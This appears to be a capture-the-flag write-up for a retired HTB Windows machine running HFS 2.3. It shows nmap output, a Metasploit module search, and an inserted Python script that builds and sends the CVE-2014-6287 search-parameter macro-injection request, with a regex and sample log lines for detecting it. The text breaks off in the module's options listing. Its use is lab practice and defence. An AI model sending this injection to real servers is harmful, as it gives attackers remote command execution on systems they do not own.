This is the sixth retired HTB machine in this series.
0x00 Target overview
The box is a Windows machine rated Easy.
0x01 Information gathering
Port scan
root@kali:~# nmap -T5 -A -v 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 00:43 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating Ping Scan at 00:43
Scanning 10.10.10.8 [4 ports]
Completed Ping Scan at 00:43, 0.55s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:43
Completed Parallel DNS resolution of 1 host. at 00:43, 0.27s elapsed
Initiating SYN Stealth Scan at 00:43
Scanning 10.10.10.8 [1000 ports]
Discovered open port 80/tcp on 10.10.10.8
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 12.03% done; ETC: 00:44 (0:01:13 remaining)
Increasing send delay for 10.10.10.8 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
SYN Stealth Scan Timing: About 18.87% done; ETC: 00:46 (0:02:52 remaining)
SYN Stealth Scan Timing: About 24.80% done; ETC: 00:48 (0:03:32 remaining)
SYN Stealth Scan Timing: About 50.07% done; ETC: 00:49 (0:03:15 remaining)
SYN Stealth Scan Timing: About 56.67% done; ETC: 00:50 (0:02:55 remaining)
SYN Stealth Scan Timing: About 62.60% done; ETC: 00:50 (0:02:35 remaining)
SYN Stealth Scan Timing: About 68.80% done; ETC: 00:50 (0:02:12 remaining)
SYN Stealth Scan Timing: About 74.67% done; ETC: 00:50 (0:01:49 remaining)
SYN Stealth Scan Timing: About 80.63% done; ETC: 00:50 (0:01:25 remaining)
SYN Stealth Scan Timing: About 86.60% done; ETC: 00:50 (0:00:59 remaining)
SYN Stealth Scan Timing: About 92.57% done; ETC: 00:50 (0:00:33 remaining)
Completed SYN Stealth Scan at 00:50, 451.02s elapsed (1000 total ports)
Initiating Service scan at 00:50
Scanning 1 service on 10.10.10.8
Completed Service scan at 00:50, 7.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.8
Retrying OS detection (try #2) against 10.10.10.8
Initiating Traceroute at 00:51
Completed Traceroute at 00:51, 0.35s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:51
Completed Parallel DNS resolution of 2 hosts. at 00:51, 0.27s elapsed
NSE: Script scanning 10.10.10.8.
Initiating NSE at 00:51
Completed NSE at 00:51, 8.54s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 2.41s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Nmap scan report for 10.10.10.8
Host is up (0.33s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.010 days (since Tue Feb 4 00:37:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 339.56 ms 10.10.14.1
2 341.07 ms 10.10.10.8
NSE: Script Post-scanning.
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 486.38 seconds
Raw packets sent: 3354 (152.624KB) | Rcvd: 384 (26.969KB)
Only one port is open, 80/tcp, and the banner already identifies it as HFS 2.3. Two caveats on this scan: -T5 over a 330 ms link made nmap drop probes and back off (the 1000-port scan took 451 s), so a -T4 run with an explicit port list would have been both faster and more reliable; and the Windows Server 2012 guess is flagged as unreliable because OS fingerprinting needs one open and one closed port, so treat it as a hint, not a result.
Identifying the application
Open the home page:
The page itself shows the software in use: HFS 2.3 (Rejetto HTTP File Server). So search Metasploit for it directly:
msf5 exploit(windows/http/rejetto_hfs_exec) > search hfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
There is indeed a matching module, exploit/windows/http/rejetto_hfs_exec, and its Check column is Yes, so it can confirm the target is vulnerable before anything is launched.
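As an added illustration (this is not part of the original writeup and not the Metasploit module's code), the request that rejetto_hfs_exec sends boils down to a single GET to the HFS search box: an encoded NUL (%00) followed by an HFS {.exec|...} template macro, which is the bug the module targets (CVE-2014-6287 in HFS 2.3 through 2.3b). The script below builds that request so you can see exactly what hits the wire, and, for the defensive side, flags the same marker in access-log lines. The host and port, the common-log-format layout, and the sample log entries are all assumptions constructed for the example.

```python
"""HFS 2.3 search-parameter macro injection: request builder and log check.

Added example, not the page's or Metasploit's own code. The target host/port
and the log lines below are constructed for illustration.
"""
import re
import urllib.parse
import urllib.request

# HFS template macro syntax: {.exec|<command>.} runs <command> on the server.
# In HFS 2.3 a leading NUL in the ?search= value stops the search handler's
# filtering while the template engine still expands the macro after it.
MACRO_OPEN = "{.exec|"
MACRO_CLOSE = ".}"


def build_exec_path(command: str) -> str:
    """Return the request path that injects `command` through the search box.

    The command is percent-encoded so spaces and slashes survive the URL;
    the macro delimiters are sent raw, as the Metasploit module does.
    """
    encoded = urllib.parse.quote(command, safe="")
    return f"/?search=%00{MACRO_OPEN}{encoded}{MACRO_CLOSE}"


def send_command(host: str, port: int, command: str, timeout: float = 5.0) -> int:
    """Send the injected request to a live HFS instance and return the HTTP status.

    HFS does not echo the command's output, so the command itself has to
    exfiltrate (write into the served directory, start a reverse shell, ...).
    Not called anywhere in this file; it is here to show the full exchange.
    """
    url = f"http://{host}:{port}{build_exec_path(command)}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:  # hypothetical target
        return resp.status


# Detection side: the injection marker as it appears in a web/proxy log,
# with the brace and dot either raw or percent-encoded.
INJECTION_RE = re.compile(r"[?&]search=%00(?:%7B|\{)(?:%2E|\.)", re.IGNORECASE)


def find_macro_injections(log_lines):
    """Return (line_number, client_ip, line) for every common-log-format line
    whose request carries the %00{. macro-injection marker."""
    hits = []
    for idx, line in enumerate(log_lines, start=1):
        if INJECTION_RE.search(line):
            client_ip = line.split()[0]
            hits.append((idx, client_ip, line))
    return hits


# Constructed sample log (common log format); lines 3 and 4 are injections.
SAMPLE_LOG = [
    '10.10.14.5 - - [04/Feb/2020:00:55:01 -0500] "GET / HTTP/1.1" 200 1834',
    '10.10.14.5 - - [04/Feb/2020:00:55:09 -0500] "GET /?search=report HTTP/1.1" 200 412',
    '10.10.14.5 - - [04/Feb/2020:00:56:30 -0500] "GET /?search=%00{.exec|'
    'C%3A%5CWindows%5CSystem32%5Ccmd.exe%20%2Fc%20whoami.} HTTP/1.1" 200 412',
    '10.10.14.7 - - [04/Feb/2020:00:57:02 -0500] "GET /?search=%00%7B.exec%7Ccalc.exe.%7D HTTP/1.1" 200 412',
]


if __name__ == "__main__":
    print("request path:", build_exec_path("cmd.exe /c whoami"))
    for line_no, ip, line in find_macro_injections(SAMPLE_LOG):
        print(f"line {line_no}: macro injection from {ip}")
```

Run it as-is to see the request path and the two flagged log lines; point send_command at a lab HFS 2.3 instance to reproduce what the module's exploit stage does before it stages the payload. Note that HFS 2.3c and later fix the NUL handling, so the module's check should fail against those.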
0x02 Getting a shell
Set the required options and run the module:
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.8 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0